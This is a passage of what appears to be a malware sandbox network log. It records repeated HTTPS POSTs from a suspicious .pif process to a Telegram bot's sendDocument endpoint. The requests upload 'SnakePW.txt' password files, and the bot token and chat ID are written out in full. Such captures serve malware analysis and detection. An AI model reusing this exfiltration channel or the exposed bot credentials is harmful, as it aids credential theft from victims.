Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:30 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418961,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535110,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.5 | 50044 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:31 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd22c3003a5e58
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:31 UTC | 535 | OUT | Data Ascii: --------------------------8dd22c3003a5e58Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:32 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:31 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:32 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418964,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535111,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      79192.168.2.550045149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22efb27445d5
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:31 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd22efb27445d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:32 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:32 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418966,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535112,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.5 | 50046 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:31 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2587cc98b653
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:31 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd2587cc98b653Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:32 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:32 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418967,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535112,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.5 | 50049 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:33 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22ff41348b47
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:33 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd22ff41348b47Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:34 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:34 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418970,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535114,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.5 | 50052 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:33 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd232b76f6085e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:33 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd232b76f6085eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:34 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:34 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418971,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535114,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.5 | 50053 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:33 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd26047d4600f9
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:33 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd26047d4600f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:34 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:34 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418973,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535114,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.5 | 50057 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:35 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2347cf9f5e67
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:35 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd2347cf9f5e67Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:36 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:35 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:36 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418976,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535115,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      85 | 192.168.2.5 | 50058 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:35 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd236fb4dcf471
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:35 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd236fb4dcf471Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:36 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:36 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418978,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535116,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      86 | 192.168.2.5 | 50059 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:35 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd268de6126dd3
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:35 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd268de6126dd3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:36 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:36 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418979,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535116,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      87 | 192.168.2.5 | 50065 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2391582c4776
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:37 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd2391582c4776Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:38 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:37 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:38 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418982,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535117,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      88 | 192.168.2.5 | 50066 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23b767e4612b
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:37 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd23b767e4612bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:38 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:38 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:38 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418984,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535118,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      89 | 192.168.2.5 | 50067 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd271102821989
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:37 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd271102821989Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:38 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:38 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:38 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418985,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535118,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      90 | 192.168.2.5 | 50072 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:39 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23ee6cc60601
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:39 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd23ee6cc60601Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:40 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:39 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:40 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418988,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535119,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.5 | 50073 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:39 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd241d958a93e9
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:39 UTC | 535 | OUT | Data Ascii: --------------------------8dd241d958a93e9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:40 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:40 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:40 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418990,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535120,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.5 | 50074 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:39 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2799595f15e7
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:39 UTC | 535 | OUT | Data Ascii: --------------------------8dd2799595f15e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:40 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:40 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:40 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418991,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535120,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 50080 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:41 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2461846d9172
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:41 UTC | 535 | OUT | Data Ascii: --------------------------8dd2461846d9172Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:41 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:41 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
